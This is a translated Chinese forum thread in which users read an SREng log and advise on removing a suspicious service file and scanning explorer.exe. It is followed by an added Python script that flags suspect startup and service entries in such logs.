[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\nfio.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\fsdrvplg.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\FSSync.dll] [Kaspersky Lab, 7.0.5.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\basegui.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\thpimpl.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\winreg.ppl] [Kaspersky Lab, 7.0.1.325]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 2148 / cyscys][D:\Program Files\sreng2\SREngLdr.EXE] [Smallfrogs Studio, 2.6.12.1018]
[PID: 2280 / cyscys][D:\Program Files\sreng2\SRE5408720f.EXE] [Smallfrogs Studio, 2.6.12.1018]
[D:\Program Files\sreng2\Upload\3rdUpd.DLL] [Smallfrogs Studio, 2, 1, 0, 15]
==================================
文件关联
.TXT Error. [C:\WINDOWS\notepad.exe %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM Error. ["hh.exe" %1]
.HLP OK. [%SystemRoot%\system32\winhlp32.exe %1]
.INI Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.VBS Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.JS Error. [%SystemRoot%\System32\CScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]
==================================
Winsock 提供者
N/A
==================================
Autorun.inf
N/A
==================================
HOSTS 文件
127.0.0.1 localhost
==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 520, C:\PROGRAM FILES\CFOSSPEED\CFOSSPEED.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 604, D:\PROGRAM FILES\ALFACLOCK\ALFACLOCK.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 632, C:\PROGRAM FILES\WINTOOLS\RAM SAVER PRO\RAMSAVERPRO.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 728, C:\PROGRAM FILES\CFOSSPEED\SPD.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2172, D:\PROGRAM FILES\BITSPIRIT\BITSPIRIT.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3904, D:\PROGRAM FILES\MAXTHON\MAXTHON.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2148, D:\PROGRAM FILES\SRENG2\SRENGLDR.EXE]
==================================
API HOOK
N/A
==================================
隐藏进程
N/A
==================================
[/code]
[[i] This post was last edited by 秋叶濛濛 on 2008-8-30 09:52 [/i]]

[b]1. Suggest using XDelBox to delete the following file[/b]: ([url=http://www.dodudou.com/down/index.php]XDelBox 1.7 download[/url])
Instructions: copy the paths of all the files to be deleted, right-click in the pending-deletion list and choose "Import from clipboard without checking paths"; after importing, right-click the file to be deleted and choose "Reboot and delete now". The computer will reboot into a DOS screen and perform the deletion. Before running XDelBox it is best to unplug all removable storage (USB sticks, MP3 players, phone memory cards, etc.).
C:\Program Files\Internet Explorer\help.com
[b]2. After deleting and rebooting, use SREng to repair the following items:[/b]
Startup items -- Services -- Win32 service applications: disable the following entry:
[Clip Book server / Clip Book server][Stopped/Auto Start]
<C:\Program Files\Internet Explorer\help.com><(File is missing)>
--------------------------------------------------------------
C:\WINDOWS\explorer.exe
C:\WINDOWS\Explorer.EXE
Upload these two to [url]http://www.virustotal.com/zh-cn/[/url] for scanning.

help.com is not a problem; it is a trace left behind by XDelBox.

EXPLORER.EXE: 1/36, only Rising reports a virus.

C:\Program Files\Internet Explorer\help.com
is an XDelBox leftover [:11:]
I can't see anything else wrong. Download Windows清理助手 and run a cleanup:
[url]http://www.arswp.com/download/arswp2/arswp2.zip[/url]

Already cleaned. The thing is, apart from what I described in the first post, there is no other sign of infection at all, and the machine runs fine after booting; only after a while does an EXE file suddenly appear and get flagged. So frustrating. Still asking for help~~~ experts, please come.

Clean out the IE and system temporary files, and clean the system with Windows清理助手,
then post a new SREng log, and remember to tick "check digital signatures of process modules".
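As an added example (not code from the thread), a small Python triage pass over lines in the SREng format posted above: it flags a startup or service entry whose image file is missing, one with no publisher, and a service whose image is not an .exe, which is what singles out the "Clip Book server" entry pointing at help.com. The sample log is a constructed excerpt of the log in this thread.

```python
"""SREng log triage (added example, not from this thread): flag startup/service
entries whose image file is missing, that carry no publisher, or, for services,
whose image is not an .exe, the way the help.com "Clip Book server" stands out."""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "section name reason detail")

RUN_RE = re.compile(r"^<(?P<name>[^<>]*)><(?P<cmd>[^<>]*)> \[(?P<pub>[^\]]*)\]$")  # Run entries
SVC_HDR_RE = re.compile(r"^\[.*? / (?P<name>[^\]]*)\]\[[^/\]]*/[^\]]*\]$")  # service header
SVC_IMG_RE = re.compile(r"^<(?P<cmd>.*)><(?P<pub>[^<>]*)>$")  # service image line
NAME_RE = re.compile(r"^\[([^\]]*)\]$")  # "[name]" line (startup-folder item)
IMAGE_RE = re.compile(r'^"?(?P<path>[^"]*?\.(?P<ext>exe|com|dat|sys|scr|bat|cmd|pif))\b', re.I)

# Constructed sample in the SREng layout; entries copied from the log in the thread.
SAMPLE_LOG = r"""
启动项目
<AVP><"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe"> [(Verified)Kaspersky Lab]
<RAMSaverPro><c:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe> []
==================================
启动文件夹
[adsl]
<C:\Documents and Settings\cyscys\「开始」菜单\程序\启动\adsl.lnk --> [File is missing]><N>
==================================
服务
[Clip Book server / Clip Book server][Stopped/Auto Start]
<C:\Program Files\Internet Explorer\help.com><(File is missing)>
[cFosSpeed System Service / cFosSpeedS][Running/Auto Start]
<"C:\Program Files\cFosSpeed\spd.exe" -service><cFos Software GmbH>
==================================
"""

def image_path(cmd):
    """Return (path, extension) of the image in a quoted or unquoted command line."""
    m = IMAGE_RE.match(cmd.strip())
    return (m.group("path"), m.group("ext").lower()) if m else (cmd.strip(), "")

def triage(log_text):
    findings = []
    section = None    # section title: first line after a '====' separator
    last_name = None  # most recent "[name]" line (startup-folder items)
    svc = None        # name of the service whose image line comes next
    for line in (l.strip() for l in log_text.splitlines()):
        if not line:
            continue
        if line.startswith("==="):
            section, last_name, svc = None, None, None
            continue
        if section is None:
            section = line
            continue
        m = SVC_HDR_RE.match(line)
        if m and section == "服务":
            svc = m.group("name")
            continue
        m = NAME_RE.match(line)
        if m:
            last_name = m.group(1)
            continue
        if svc is not None:
            m = SVC_IMG_RE.match(line)
            if m:
                path, ext = image_path(m.group("cmd"))
                if "File is missing" in m.group("pub"):
                    findings.append(Finding(section, svc, "file missing", path))
                elif not m.group("pub"):
                    findings.append(Finding(section, svc, "no publisher", path))
                if ext and ext != "exe":
                    findings.append(Finding(section, svc, "non-exe image", path))
            svc = None
            continue
        m = RUN_RE.match(line)
        if m:
            if m.group("cmd") and not m.group("pub"):
                findings.append(Finding(section, m.group("name"), "no publisher", m.group("cmd")))
            continue
        if "File is missing" in line:
            findings.append(Finding(section, last_name or "?", "file missing", line))
    return findings
```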